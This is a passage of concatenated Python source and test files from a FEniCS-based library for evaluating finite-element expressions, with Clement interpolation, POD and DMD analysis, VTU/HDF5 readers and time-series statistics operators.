# Elliminate expressions build from Trial/Test functions, FacetNormals
terminals = [t for t in ufl.corealg.traversal.traverse_unique_terminals(expr)]
if any(isinstance(t, black_listed) for t in terminals):
raise ValueError('Invalid expression (e.g. has Arguments as operand)')
# At this point the expression is valid
return terminals
def _analyze_shape(shape):
'''
The shape of expr that UFL can build is arbitrary but we only support
scalar, rank-1 and rank-2(square) tensors.
'''
is_valid = len(shape) < 3 and (shape[0] == shape[1] if len(shape) == 2 else True)
if not is_valid:
raise ValueError('Interpolating Expr does not result rank-0, 1, 2 function')
def _extract_mesh(terminals):
'''Get the common mesh of operands that make the expression.'''
pairs = []
for t in terminals:
try:
mesh = t.function_space().mesh()
pairs.append((mesh.id(), mesh))
except AttributeError:
try:
mesh = t.ufl_domain().ufl_cargo()
pairs.append((mesh.id(), mesh))
except AttributeError:
pass
ids = set(id_ for id_, _ in pairs)
# Unique mesh
if len(ids) == 1: return pairs.pop()[1]
# Mesh of Nones of multiple
raise ValueError('Failed to extract mesh: Operands with no or different meshes')
def _construct_summation_operator(V):
'''
Summation matrix has the following properties: It is a map from DG0 to CG1.
It has the same sparsity pattern as the mass matrix and in each row the nonzero
entries are 1. Finally let v \in DG0 then (A*v)_i is the sum of entries of v
that live on the support of i-th basis function of CG1.
'''
mesh = V.mesh()
Q = FunctionSpace(mesh, 'DG', 0)
q = TrialFunction(Q)
v = TestFunction(V)
tdim = mesh.topology().dim()
K = CellVolume(mesh)
dX = dx(metadata={'form_compiler_parameters': {'quadrature_degree': 1,
'quadrature_scheme': 'vertex'}})
# This is a nice trick which uses properties of the vertex quadrature to get
# only ones as nonzero entries.
# NOTE: Its is designed spec for CG1. In particular does not work CG2 etc so
# for such spaces a difference construction is required, e.g. rewrite nnz
# entries of mass matric V, Q to 1. That said CG2 is the highest order where
# clement interpolation makes sense. With higher ordered the dofs that are
# interior to cell (or if there are multiple dofs par facet interior) are
# assigned the same value.
A = assemble((1./K)*Constant(tdim+1)*inner(v, q)*dX)
return A
def _construct_averaging_operator(V, c):
'''
If b is the vectors of L^2 means of some u on the mesh, v is the vector
of cell volumes and A is the summation oparotr then x=(Ab)/(Ac) are the
coefficient of Clement interpolant of u in V. Here we construct an operator
B such that x = Bb.
'''
assert parameters['linear_algebra_backend'] == 'PETSc'
A = _construct_summation_operator(V)
Ac = Function(V).vector()
A.mult(c, Ac)
# 1/Ac
Ac = as_backend_type(Ac).vec()
Ac.reciprocal()
# Scale rows
mat = as_backend_type(A).mat()
mat.diagonalScale(L=Ac)
return A
|
MiroK/fenics-cacl | test/test_clement.py | <filename>test/test_clement.py
from xcalc.interpreter import Eval
from dolfin import *
import numpy as np
import unittest
def error(true, me):
mesh = me.function_space().mesh()
return sqrt(abs(assemble(inner(me - true, me - true)*dx(domain=mesh))))
class TestClement(unittest.TestCase):
'''Sanity'''
def test(self):
errors, hs = [], []
for n in (4, 8, 16, 32):
mesh = UnitSquareMesh(n, n)
x, y = SpatialCoordinate(mesh)
uh = Eval(grad(x**2 + y**2))
u = as_vector((2*x, 2*y))
errors.append(error(u, uh))
hs.append(mesh.hmin())
self.assertTrue(np.all(np.diff(errors) < 0))
# Actual rate
deg = np.round(np.polyfit(np.log(hs), np.log(errors), 1)[0], 0)
self.assertTrue(deg >= 1)
|
MiroK/fenics-cacl | test/test_known_fail.py | <gh_stars>1-10
from xcalc.interpreter import Eval
from dolfin import *
import numpy as np
import unittest
def error(true, me):
mesh = me.function_space().mesh()
return sqrt(abs(assemble(inner(me - true, me - true)*dx(domain=mesh))))
class TestCases(unittest.TestCase):
'''UnitTest for (some of) xcalc.interpreter (no timeseries)'''
def test_maybe_fix_future(self):
mesh = UnitSquareMesh(10, 10)
V = FunctionSpace(mesh, 'RT', 1)
x = Function(V)
y = Function(V)
for f in (inner(x, y), as_vector((x[0], y[1])), 2*x+y):
with self.assertRaises(AssertionError):
Eval(f)
|
MiroK/fenics-cacl | xcalc/dmd.py | from dolfin import Function
from collections import namedtuple
import numpy as np
ComplexFunction = namedtuple('ComplexFunction', ('real', 'imag'))
def dmd(functions, dmd_object, dt=1, modal_analysis=[]):
'''
Dynamic mode decomposition:
<NAME>. (2010), vol. 656, pp. 5-28 (idea)
On dynamic mode decomposition: theory and application; Tu, J. H et al. (implement)
DMD of (ordered, dt-equispaced) snapshots. dmd_object is the configured DMDBase instance.
'''
assert all(isinstance(f, Function) for f in functions)
# Wrap for pydmd
X = np.array([f.vector().get_local() for f in functions]).T
# Rely on pydmd
dmd_object.fit(X)
dmd_object.original_time['dt'] = dt
V = functions[0].function_space()
eigs = dmd_object.eigs
modes = []
# NOTE: unlike with pod where the basis was only real here the
# modes might have complex components so ...
for x in dmd_object.modes.T:
f_real = Function(V)
f_real.vector().set_local(x.real)
f_imag = Function(V)
f_imag.vector().set_local(x.imag)
modes.append(ComplexFunction(f_real, f_imag))
if len(modal_analysis):
return eigs, modes, dmd_object.dynamics[modal_analysis]
return eigs, modes
# ------------------------------------------------------------------------------
if __name__ == '__main__':
from dolfin import UnitSquareMesh, Expression, FunctionSpace, interpolate, File
from dolfin import XDMFFile, inner, grad, dx, assemble
from interpreter import Eval
# Build a monomial basis for x, y, x**2, xy, y**2, ...
try:
from pydmd import DMD
# https://github.com/mathLab/PyDMD
except ImportError:
from xcalc.dmdbase import DMD
deg = 4
mesh = UnitSquareMesh(3, 3)
V = FunctionSpace(mesh, 'CG', 1)
f = interpolate(Expression('x[0]+x[1]', degree=1), V).vector().get_local()
A = np.diag(np.random.rand(V.dim()))
basis = []
for i in range(deg):
for j in range(deg):
f = A.dot(f)
Af = Function(V); Af.vector().set_local(f)
basis.append(Af)
# NOTE: skipping 1 bacause Eval of it is not a Function
dmd_ = DMD(svd_rank=-1, exact=False)
energy, pod_basis = dmd(basis[1:], dmd_)
print np.linalg.norm(dmd_.snapshots - dmd_.reconstructed_data.real)
print len(pod_basis), len(basis[1:])
|
MiroK/fenics-cacl | xcalc/function_read.py | # This is the most fragile component of the package so be advised that
# these ARE NOT GENERAL PURPOSE READEDERS
from dolfin import Function, dof_to_vertex_map, warning, Mesh, MeshEditor
import xml.etree.ElementTree as ET
from itertools import dropwhile
from mpi4py import MPI
import numpy as np
try:
import h5py
except ImportError:
warning('H5Py missing')
assert MPI.COMM_WORLD.size == 1, 'No parallel (for your own good)'
def data_reordering(V):
'''Reshaping/reordering data read from files'''
# HDF5/VTK store 3d vectors and 3d tensor so we need to chop the data
# also reorder as in 2017.2.0 only(?) vertex values are dumped
if V.ufl_element().value_shape() == ():
dof2v = dof_to_vertex_map(V)
reorder = lambda a: a[dof2v]
return reorder
Vi = V.sub(0).collapse()
dof2v = dof_to_vertex_map(Vi)
gdim = V.mesh().geometry().dim()
# WARNING: below there are assumption on component ordering
# Vector
if len(V.ufl_element().value_shape()) == 1:
# Ellim Z for vectors in 2d
keep = [0, 1] if gdim == 2 else range(gdim)
reorder = lambda a, keep=keep, dof2f=dof2v:(
np.column_stack([row[dof2v] for row in (a[:, keep]).T]).flatten()
)
return reorder
# And tensor
if len(V.ufl_element().value_shape()) == 2:
# Ellim Z
keep = [0, 1, 3, 4] if gdim == 2 else range(gdim**2)
reorder = lambda a, keep=keep, dof2f=dof2v:(
np.column_stack([row[dof2v] for row in (a[:, keep]).T]).flatten()
)
return reorder
def read_vtu_function(vtus, V):
'''Read in functions in V from VTUs files'''
# NOTE: this would much easier with (py)vtk but that is not part of
# the FEniCS stack so ...
gdim = V.mesh().geometry().dim()
assert gdim > 1
if isinstance(vtus, str): vtus = [vtus]
reorder = data_reordering(V)
npoints, ncells = V.mesh().num_vertices(), V.mesh().num_cells()
functions = []
for vtu in vtus:
f = Function(V)
data = read_vtu_point_data(vtu, npoints, ncells)
f.vector().set_local(reorder(data))
functions.append(f)
return functions
def read_vtu_point_data(vtu, nvertices, ncells):
'''PointData element of ASCII VTU file'''
tree = ET.parse(vtu)
root = tree.getroot()
grid = next(iter(root))
piece = next(iter(grid))
# Check consistency of mesh (somewhat)
assert nvertices == int(piece.attrib['NumberOfPoints'])
assert ncells == int(piece.attrib['NumberOfCells'])
# Throw StopIteration
point_data_elm = next(dropwhile(lambda x: x.tag != 'PointData', piece))
data = next(iter(point_data_elm))
ncomps = int(data.attrib.get('NumberOfComponents', 0))
values = np.array(map(float, filter(bool, data.text.split(' '))))
# Reshape for reorder (so it is same as H5File
if ncomps:
values = values.reshape((-1, ncomps))
return values
def read_h5_function(h5_file, times, V):
'''
Read in function in V from h5_file:/VisualisationVector/times
'''
gdim = V.mesh().geometry().dim()
assert gdim > 1
if isinstance(times, str): times = [times]
reorder = data_reordering(V)
functions = []
# Read the functions
with h5py.File(h5_file, 'r') as h5:
group = h5.get('VisualisationVector')
for key in times:
f = Function(V) # What to fill
data = group[key].value
f.vector().set_local(reorder(data))
functions.append(f)
return functions
def read_h5_mesh(path, cell_type):
'''Read in mesh from function stored in H5 file'''
# Is there a better way? (via HDF5File)
h5 = h5py.File(path, 'r')
mesh_group = h5['Mesh']['0']['mesh']
vertices = mesh_group['geometry'].value
cells = mesh_group['topology'].value
return make_mesh(vertices, cells, cell_type)
def read_vtu_mesh(path, cell_type):
'''Read in mesh from function stored in vtu file'''
tree = ET.parse(path)
root = tree.getroot()
grid = next(iter(root))
piece = next(iter(grid))
points, cells, _ = list(piece)
# Parse points
point_data = next(iter(points))
# Always 3d gdim with this file format
gdim = cell_type.geometric_dimension()
point_data = np.array(map(float, filter(bool, point_data.text.split(' '))))
point_data = point_data.reshape((-1, 3))[:, :gdim]
# Parse cells
cell_data = next(iter(cells))
cell_data = np.array(map(int, filter(bool, cell_data.text.split(' '))))
cell_data = cell_data.reshape((-1, cell_type.num_vertices()))
return make_mesh(point_data, cell_data, cell_type)
def make_mesh(vertices, cells, cell_type):
'''Mesh from data by MeshEditor'''
gdim = cell_type.geometric_dimension()
assert vertices.shape[1] == gdim
tdim = cell_type.topological_dimension()
mesh = Mesh()
editor = MeshEditor()
editor.open(mesh, str(cell_type), tdim, gdim)
editor.init_vertices(len(vertices))
editor.init_cells(len(cells))
for vi, x in enumerate(vertices): editor.add_vertex(vi, x)
for ci, c in enumerate(cells): editor.add_cell(ci, *c)
editor.close()
return mesh
|
MiroK/fenics-cacl | apps/series_pod_analysis.py | from xcalc.function_read import read_vtu_mesh
from xcalc.timeseries import PVDTempSeries
from xcalc.interpreter import Eval
from xcalc.operators import Mean, RMS
from xcalc.pod import pod
from dolfin import *
import numpy as np
dir = '/mn/sarpanitu/eksterne-u1/mirok/Documents/Programming/DragANN/data/ActiveControl'
# Since we want to combine the two series loading the mesh automatically would
# give different mesh IDs - xcalc is strict about this assumption so declare the
# mesh/space ourselves
cell = triangle
mesh = read_vtu_mesh('%s/p_out000000.vtu' % dir, cell)
# Load series
Q = FunctionSpace(mesh, FiniteElement('Lagrange', cell, 1))
p = PVDTempSeries('%s/p_out.pvd' % dir, Q)
V = FunctionSpace(mesh, VectorElement('Lagrange', cell, 1))
v = PVDTempSeries('%s/u_out.pvd' % dir, V)
# Chop to region of interest
temp_slice = slice(200, 401, None)
p = p.getitem(temp_slice)
v = v.getitem(temp_slice)
# Some funny series that we want to look at
function_series = Eval(sqrt(p**2 + inner(v, v)/2))
# NOTE: nodes are the actual functions in the series
functions = function_series.nodes
# Run pod analysis on it
nmodes = 6
energy, pod_basis, C = pod(functions, modal_analysis=range(nmodes))
out = File('%s/pod_%s.pvd' % (dir, dir.lower()))
for index, f in enumerate(pod_basis[slice(0, nmodes)]):
f.rename('f', '0')
out << (f, float(index))
# Dump the energy
np.savetxt('%s/pod_%s_energy.txt' % (dir, dir.lower()), energy)
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
plt.figure()
plt.semilogy(energy, color='blue', marker='o', linestyle=':')
plt.savefig('%s/pod_%s_energy.png' % (dir, dir.lower()))
times = function_series.times
plt.figure()
for i, coef_i in enumerate(C):
plt.plot(times, coef_i, label=str(i))
plt.legend(loc='best')
plt.savefig('%s/pod_%s_modes.png' % (dir, dir.lower()))
plt.show()
|
MiroK/fenics-cacl | xcalc/pod.py | <reponame>MiroK/fenics-cacl
from dolfin import Function
from types import FunctionType
import numpy as np
def pod(functions, ip=lambda u, v: u.vector().inner(v.vector()), modal_analysis=[]):
'''
Proper orthogonal decomposition
Let there be a collection of Functions and an inner product. POD constructs
basis of the space spanned by functions according to the eigendecomposition
of the inner product matrix. Let that basis be {phi_i}. Each fj of functions
can be decomposed in the basis as fj = c^{j}_i phi_i. If j is associated with
time then c^{all j}_i give a temporal evolution of the coef for mode i.
With `modal_analysis` a matrix C is returned which corresponds to
coef of i-th modes.
'''
# Sanity of inputs
assert all(isinstance(f, Function) for f in functions)
assert isinstance(ip, FunctionType) and nargs(ip) == 2
# Build the (symmetric) matrix of the inner products
n = len(functions)
A = np.zeros((n, n))
for i, fi in enumerate(functions):
A[i, i] = ip(fi, fi)
for j, fj in enumerate(functions[i+1:], i+1):
value = ip(fi, fj)
A[i, j] = A[j, i] = value
eigw, eigv = np.linalg.eigh(A)
# NOTE: the matrix should normally be pos def but round of ...
eigw = np.abs(eigw)
# Make eigv have rows as vectors
eigv = eigv.T
# Reverse so that largest modes come first
eigw = eigw[::-1]
eigv = eigv[::-1]
# New basis function are linear combinations with weights given by eigv[i]
pod_basis = [linear_combination(c, functions, np.sqrt(a)) for c, a in zip(eigv, eigw)]
if not modal_analysis:
return eigw, pod_basis
C = np.array([[ip(pod_basis[i], fj) for fj in functions] for i in modal_analysis])
return eigw, pod_basis, C
def linear_combination(coefs, foos, scale=1):
'''Construct a new function as a linear combinations (1./scale)*sum_i coefs[i]*foos[i]'''
assert all(isinstance(f, Function) for f in foos)
assert len(coefs) == len(foos)
assert len(foos)
# For the reasons of speed we do this in C (no Eval)
f = Function(foos[0].function_space()) # Zero
F = f.vector()
for ci, fi in zip(coefs, foos):
F.axpy(ci, fi.vector())
F /= scale
return f
def normalize(f, ip):
'''Normalize f to be ip(f, f) = 1'''
f.vector()[:] *= 1./sqrt(ip(f, f))
return f
def nargs(f):
'''Argument count of a function'''
return f.__code__.co_argcount
# ------------------------------------------------------------------------------
if __name__ == '__main__':
from dolfin import UnitSquareMesh, Expression, FunctionSpace, interpolate, File
from dolfin import XDMFFile, inner, grad, dx, assemble
from interpreter import Eval
# Build a monomial basis for x, y, x**2, xy, y**2, ...
deg = 4
mesh = UnitSquareMesh(3, 3)
V = FunctionSpace(mesh, 'CG', 3)
x = interpolate(Expression('x[0]', degree=1), V)
y = interpolate(Expression('x[1]', degree=1), V)
basis = []
for i in range(deg):
for j in range(deg):
basis.append(Eval((x**i)*(y**j)))
ip = lambda u, v: u.vector().inner(v.vector())
#ip = lambda u, v: assemble(inner(u, v)*dx)
#ip = lambda u, v: assemble(inner(u, v)*dx + inner(grad(u), grad(v))*dx)
# NOTE: skipping 1 bacause Eval of it is not a Function
energy, pod_basis = pod(basis[1:], ip=ip)
out = File('pod_test.pvd')
for i, f in enumerate(pod_basis):
f.rename('f', '0')
out << (f, float(i))
with XDMFFile(mesh.mpi_comm(), 'pod_test.xdmf') as out:
for i, f in enumerate(pod_basis):
f.rename('f', '0')
out.write(f, float(i))
for fi in pod_basis:
for fj in pod_basis:
print ip(fi, fj)
print
|
MiroK/fenics-cacl | xcalc/operators.py | <reponame>MiroK/fenics-cacl<gh_stars>1-10
# Some pseudo nodes (function constructors) that could be useful
from dolfin import Constant, interpolate, Function, as_backend_type
from collections import deque
from utils import numpy_op_foo, common_sub_element, make_space
from ufl.corealg.traversal import traverse_unique_terminals
import timeseries
import interpreter
import numpy as np
class LazyNode(Function):
'''Interac'''
def __init__(self, V):
Function.__init__(self, V)
def evaluate(self):
return Abstract
@staticmethod
def space_for(expr, shape=None):
'''Function space where expr should be represented'''
# Don't want to call eval here as it beats the goal of being lazy
foos = filter(lambda f: isinstance(f, Function), traverse_unique_terminals(expr))
_, = set(f.function_space().mesh().id() for f in foos)
elm = common_sub_element([f.function_space() for f in foos])
shape = expr.ufl_shape if shape is None else shape
mesh = foos[0].function_space().mesh()
return make_space(elm, shape, mesh)
class ConstantFunction(LazyNode):
def __init__(self, V, value):
self.value = Constant(value)
# Don't allow declaring bullshit
assert V.ufl_element().value_shape() == self.value.ufl_shape
LazyNode.__init__(self, V)
def evaluate(self):
self.interpolate(self.value)
return self
def Zero(V):
'''Zero function over V'''
return ConstantFunction(V, Constant(np.zeros(V.ufl_element().value_shape())))
class Eigw(LazyNode):
'''
For a matrix-valued expression we make a vector-valued expression of eigenvalues
'''
def __init__(self, expr):
n, m = expr.ufl_shape
assert n == m, 'Square matrices only (or implement SVD)'
self.shape = (n, )
self.expr = expr
LazyNode.__init__(self, LazyNode.space_for(expr, self.shape))
def evaluate(self):
f = interpreter.Eval(self.expr)
self.interpolate(numpy_op_foo(args=(f, ), op=np.linalg.eigvals, shape_res=self.shape))
return self
class Eigv(LazyNode):
'''
For a matrix-valued expression we make a matrix-valued expression where the rows
have the eigenvector
'''
def __init__(self, expr):
n, m = expr.ufl_shape
assert n == m, 'Square matrices only (or implement SVD)'
self.shape = (n, m)
self.expr = expr
LazyNode.__init__(self, LazyNode.space_for(expr, self.shape))
def evaluate(self):
f = interpreter.Eval(self.expr)
self.interpolate(numpy_op_foo(args=(f, ),
op=lambda A: np.linalg.eig(A)[1].T,
shape_res=self.shape))
return self
class Minimum(LazyNode):
'''Minimum value in a tensor of rank > 0'''
def __init__(self, expr):
assert len(expr.ufl_shape) > 0
self.shape = ()
self.expr = expr
LazyNode.__init__(self, LazyNode.space_for(expr, self.shape))
def evaluate(self):
f = interpreter.Eval(self.expr)
self.interpolate(numpy_op_foo(args=(f, ), op=np.min, shape_res=self.shape))
return self
class Maximum(LazyNode):
'''Maximum value in a tensor of rank > 0'''
def __init__(self, expr):
assert len(expr.ufl_shape) > 0
self.shape = ()
self.expr = expr
LazyNode.__init__(self, LazyNode.space_for(expr, self.shape))
def evaluate(self):
f = interpreter.Eval(self.expr)
self.interpolate(numpy_op_foo(args=(f, ), op=np.max, shape_res=self.shape))
return self
class Mean(LazyNode):
'''A mean of the series is 1/(T - t0)\int_{t0}^{t1}f(t)dt'''
def __init__(self, expr):
self.expr = expr
LazyNode.__init__(self, LazyNode.space_for(expr))
def evaluate(self):
# Apply simpsons rule
series = interpreter.Eval(self.expr) # Functions
mean = self
x = mean.vector()
x.zero()
# NOTE: for effiecency we stay away from Interpreter
# Int
dts = np.diff(series.times)
for dt, (f0, f1) in zip(dts, zip(series.nodes[:-1], series.nodes[1:])):
x.axpy(dt/2., f0.vector()) # (f0+f1)*dt/2
x.axpy(dt/2., f1.vector())
# Time interval scaling
x /= dts.sum()
return self
class RMS(LazyNode):
'''sqrt(1/(T - t0)\int_{t0}^{t1}f^2(t)dt'''
def __init__(self, expr):
self.expr = expr
LazyNode.__init__(self, LazyNode.space_for(expr))
def evaluate(self):
# Again by applying simpson
series = interpreter.Eval(self.expr)
rms = self
# NOTE: for efficiency we stay away from Interpreter and all is in PETSc layer
x = as_backend_type(rms.vector()).vec() # PETSc.Vec
x.zeroEntries()
y = x.copy() # Stores fi**2
# Integrate
dts = np.diff(series.times)
f_vectors = [as_backend_type(f.vector()).vec() for f in series.nodes]
for dt, (f0, f1) in zip(dts, zip(f_vectors[:-1], f_vectors[1:])):
y.pointwiseMult(f0, f0) # y = f0**2
x.axpy(dt/2., y) # (f0**2+f1**2)*dt/2
y.pointwiseMult(f1, f1) # y = f1**2
x.axpy(dt/2., y)
# Time interval scaling
x /= dts.sum()
# sqrt
x.sqrtabs()
return self
class STD(LazyNode):
'''STD of series.'''
def __init__(self, expr):
self.expr = expr
LazyNode.__init__(self, LazyNode.space_for(expr))
def evaluate(self):
# first, compute the mean
series = interpreter.Eval(self.expr)
mean = interpreter.Eval(Mean(series))
# get the square of the field of the mean
mean_vector = mean.vector()
mvs = as_backend_type(mean_vector).vec()
# the mean squared, to be used for computing the RMS
mvs.pointwiseMult(mvs, mvs)
# now, compute the STD
# for this, follow the example of RMS
std = self
# NOTE: for efficiency we stay away from Interpreter and all is in PETSc layer
x = as_backend_type(std.vector()).vec() # PETSc.Vec, stores the final output
x.zeroEntries()
y = x.copy() # Stores the current working field
# Integrate
dts = np.diff(series.times)
f_vectors = [as_backend_type(f.vector()).vec() for f in series.nodes]
for dt, (f0, f1) in zip(dts, zip(f_vectors[:-1], f_vectors[1:])):
y.pointwiseMult(f0, f0) # y = f0**2
x.axpy(dt / 2., y) # x += dt / 2 * y
y.pointwiseMult(f1, f1) # y = f1**2
x.axpy(dt / 2., y) # x += dt / 2 * y
x.axpy(-dt, mvs) # x += -dt * mvs NOTE: no factor 2, as adding 2 dt / 2 to compensate
# Time interval scaling
x /= dts.sum()
# sqrt
x.sqrtabs()
return self
def SlidingWindowFilter(Filter, width, series):
'''
Collapse a series into a different (shorter) series obtained by applying
filter to the chunks of series of given width.
'''
assert width > 0
t_buffer, f_buffer = deque(maxlen=width), deque(maxlen=width)
series = interpreter.Eval(series)
times = series.times
nodes = series.nodes
filtered_ft_pairs = []
for t, f in zip(times, nodes):
t_buffer.append(t)
f_buffer.append(f)
# Once the deque is full it will 'overflow' from right so then
# we have the right view to filter
if len(f_buffer) == width:
ff = Filter(timeseries.TempSeries(zip(list(f_buffer), list(t_buffer))))
tf = list(t_buffer)[width/2] # Okay for odd
filtered_ft_pairs.append((ff, tf))
return timeseries.TempSeries(filtered_ft_pairs)
|
MiroK/fenics-cacl | xcalc/utils.py | from dolfin import Function, FunctionSpace, VectorElement, TensorElement
from itertools import imap, izip, dropwhile, ifilterfalse, ifilter
from ufl.indexed import Index, FixedIndex, MultiIndex
from ufl.core.terminal import Terminal
def make_function(V, coefs):
'''A function in V with coefs'''
f = Function(V)
f.vector().set_local(coefs)
# FIXME: parallel
return f
def coefs_of(f):
'''Extract coefficients of f'''
# We arrive here either with a function or a number
if isinstance(f, Function):
return f.vector().get_local()
assert isinstance(f, (int, float)), (f, type(f))
return f
def space_of(foos):
'''Extract the function space for representing foos'''
# We arrive here either with a function or a number
elm, mesh = None, None
for f in filter(lambda x: isinstance(x, Function), foos):
elm_ = f.function_space().ufl_element()
mesh_ = f.function_space().mesh()
if elm is None:
elm = elm_
mesh = mesh_
else:
assert elm_ == elm and mesh.id() == mesh_.id()
return FunctionSpace(mesh, elm)
def numpy_op_indices(V):
'''Iterator over dofs of V in a logical way'''
# next(numpy_of_indices(V)) gets indices for accessing coef of function in V
# in a way that after reshaping the values can be used by numpy
nsubs = V.num_sub_spaces()
# Get will give us e.g matrix to go with det to set the value of det
if nsubs:
indices = imap(list, izip(*[iter(V.sub(comp).dofmap().dofs()) for comp in range(nsubs)]))
else:
indices = iter(V.dofmap().dofs())
return indices
def common_sub_element(spaces):
'''V for space which are tensor products of V otherwise fail'''
V = None
for space in spaces:
V_ = component_element(space)
# Unset or agrees
assert V is None or V == V_
V = V_
# All is well
return V
def component_element(elm):
'''If the space/FE has a structure V x V ... x V find V'''
# Type convert
if isinstance(elm, FunctionSpace):
return component_element(elm.ufl_element())
# Single component
if not elm.sub_elements():
return elm
# V x V x V ... => V
V_, = set(elm.sub_elements())
return V_
def shape_representation(shape, elm):
'''How to reshape expression of shape represented in FE space with elm'''
celm = component_element(elm)
# Scalar is a base
if not celm.value_shape():
return shape
# Can't represent vector with matrix space
eshape = celm.value_shape()
assert len(shape) >= len(eshape)
# Vec with vec requires no reshaping
if shape == eshape:
return ()
# Compatibility
assert shape[-len(eshape):] == eshape
# So (2, 2) with (2, ) is (2, )
return shape[:len(eshape)]
def make_space(V, shape, mesh):
'''Tensor product space of right shape'''
finite_elements = [lambda x, shape: x,
lambda x, shape: VectorElement(x, dim=shape[0]),
lambda x, shape: TensorElement(x, shape=shape)]
# FEM upscales; cant upscale larger
assert len(shape) - len(V.value_shape()) >= 0
# No tensor
assert len(shape) <= 2
fe_glue = finite_elements[len(shape) - len(V.value_shape())]
elm = fe_glue(V, shape)
return FunctionSpace(mesh, elm)
def numpy_op_foo(args, op, shape_res):
'''Construct function with shape_res ufl_shape by applying op to args'''
# Do we have V x V x ... spaces?
sub_elm = common_sub_element([space_of((arg, )) for arg in args])
get_args = []
# Construct iterators for accesing the coef values of arguments in the
# right way be used with numpy op
for arg in args:
arg_coefs = coefs_of(arg)
V = arg.function_space()
shape = shape_representation(arg.ufl_shape, V.ufl_element())
# How to access coefficients by indices
indices = numpy_op_indices(V)
# Get values for op by reshaping
if shape:
get = imap(lambda i, c=arg_coefs, s=shape: c[i].reshape(s), indices)
else:
get = imap(lambda i, c=arg_coefs: c[i], indices)
get_args.append(get)
# Now all the arguments can be iterated to gether by
args = izip(*get_args)
# Construct the result space
V_res = make_space(sub_elm, shape_res, V.mesh())
# How to reshape the result and assign
if shape_representation(shape_res, V_res.ufl_element()):
dofs = imap(list, numpy_op_indices(V_res))
reshape = lambda x: x.flatten()
else:
dofs = numpy_op_indices(V_res)
reshape = lambda x: x
# Fill coefs of the result expression
coefs_res = Function(V_res).vector().get_local()
for dof, dof_args in izip(dofs, args):
coefs_res[dof] = reshape(op(*dof_args))
# NOTE: make_function so that there is only one place (hopefully)
# where parallelism needs to be addressed
return make_function(V_res, coefs_res)
# Utils for series
def find_first(things, predicate):
'''Index of first item in container which satisfies the predicate'''
return next(dropwhile(lambda i, s=things: not predicate(s[i]), range(len(things))))
def find_last(things, predicate):
'''Counting things backward the index of the first item satisfying the predcate'''
return -find_first(list(reversed(things)), predicate)-1
def clip_index(array, first, last):
'''Every item x in array[clip_index(...)] satisfied first < x < last'''
assert first < last
f = find_first(array, lambda x, f=first: x > f)
l = find_last(array, lambda x, l=last: x < l) + 1
return slice(f, l)
# UFL utils for substitution of indices
def is_index(expr):
return isinstance(expr, (Index, FixedIndex))
def traverse_indices(expr):
'''Traverse the UFL expression (drilling into indices)'''
if expr.ufl_operands:
for op in expr.ufl_operands:
for e in ifilter(is_index, traverse_indices(op)):
yield e
# Multiindex has no operands but we want the indices
if isinstance(expr, MultiIndex):
for i in expr.indices():
yield i
def matches(expr, target):
'''Compare two indices for equalty'''
return expr == target
def contains(expr, target):
'''Is the target index contained in the expression?'''
# A tarminal target either agrees or is one of the expr terminals
if is_index(expr):
return expr == target
else:
return any(matches(target, t) for t in traverse_indices(expr))
def replace(expr, arg, replacement):
'''A new expression where argument in the expression is the replacement'''
# Do nothing if no way to substitute, i.e. return original
if not contains(expr, arg):
return expr
# Identical
if matches(expr, arg):
return replacement
# Reconstruct the node with the substituted argument
if expr.ufl_operands:
return type(expr)(*[replace(op, arg, replacement) for op in expr.ufl_operands])
# This has to be MultiIndex
return MultiIndex(tuple(replace(op, arg, replacement) for op in expr.indices()))
|
MiroK/fenics-cacl | xcalc/timeseries.py | import xml.etree.ElementTree as ET
from function_read import (read_h5_function, read_vtu_function,
read_h5_mesh, read_vtu_mesh)
from dolfin import (Function, XDMFFile, HDF5File, FunctionSpace,
VectorFunctionSpace, TensorFunctionSpace, warning)
from ufl.corealg.traversal import traverse_unique_terminals
from utils import space_of, clip_index
import interpreter
import numpy as np
import itertools
import os
class TempSeries(Function):
'''
Collection of snapshots that are when Eval are functions in same
space V. That is, series are lazy in general. UFL nodes are supported
over series with logic op([s], [t]) = [op(s, t)].
'''
def __init__(self, ft_pairs):
# NOTE: this is derived from Function just to allow nice
# interplay with the interpreter. If there were space time
# elements then we could have eval f(t, x) support
nodes, times = list(zip(*ft_pairs))
# Checks some necessaru conditions for compatibility of nodes in the series
assert check_nodes(nodes)
# Optimistically take the function space
V = interpreter.Eval(next(iter(nodes))).function_space()
# Time interval check
dt = np.diff(times)
assert (dt > 0).all()
self.nodes = nodes
self.times = times
self.V = V
Function.__init__(self, V)
def __iter__(self):
'''Iterate nodes in the series'''
# op(series) = series(op(functions))
for f in self.nodes: yield f
def __len__(self):
return len(self.nodes)
def getitem(self, index):
'''Access elements of the time series'''
if isinstance(index, int):
return self.nodes[index]
else:
return TempSeries(zip(self.nodes[index], self.times[index]))
def stream(series, f):
'''Pipe series through Function f'''
series = interpreter.Eval(series)
assert series.V.ufl_element() == f.function_space().ufl_element()
assert series.V.mesh().id() == f.function_space().mesh().id()
for f_ in series: # Get your own iterator
f.vector().set_local(f_.vector().get_local())
yield f
def clip(series, t0, t1):
'''A view of the series with times such that t0 < times < t1'''
index = clip_index(series.times, t0, t1)
nodes = series.nodes[index]
times = series.times[index]
return TempSeries(zip(nodes, times))
def common_interval(series):
'''Series are compatible if they have same intervals'''
series = filter(lambda s: isinstance(s, TempSeries), series)
interval = []
for s in series:
interval_ = np.array(s.times)
assert not len(interval) or np.linalg.norm(interval - interval_) < 1E-14
interval = interval_
return interval
def check_nodes(series):
'''
Nodes in the series are said to be compatible here iff
1) they are over the same mesh
2) they have the same base element
3) they have the same shape
'''
shape, = set(f.ufl_shape for f in series)
terminal_functions = lambda s=series: (
itertools.ifilter(lambda f: isinstance(f, Function),
itertools.chain(*map(traverse_unique_terminals, s)))
)
# Base element
family, = set(f.ufl_element().family() for f in terminal_functions())
degree, = set(f.ufl_element().degree() for f in terminal_functions())
# Mesh
mesh_id, = set(f.function_space().mesh().id() for f in terminal_functions())
return True
def get_P1_space(V):
'''Get the Lagrange CG1 space corresponding to V'''
# This is how in essence FEniCS 2017.2.0 dumps data, i.e. there is
# no support for higher order spaces
assert V.ufl_element().family() != 'Discontinuous Lagrange' # Cell data needed
mesh = V.mesh()
elm = V.ufl_element()
if elm.value_shape() == ():
return FunctionSpace(mesh, 'CG', 1)
if len(elm.value_shape()) == 1:
return VectorFunctionSpace(mesh, 'CG', 1)
return TensorFunctionSpace(mesh, 'CG', 1)
def PVDTempSeries(path, V=None, first=0, last=None):
'''
Read in the temp series of functions in V from PVD file. If V is not
a function space then a finite element has to be provided for constructing
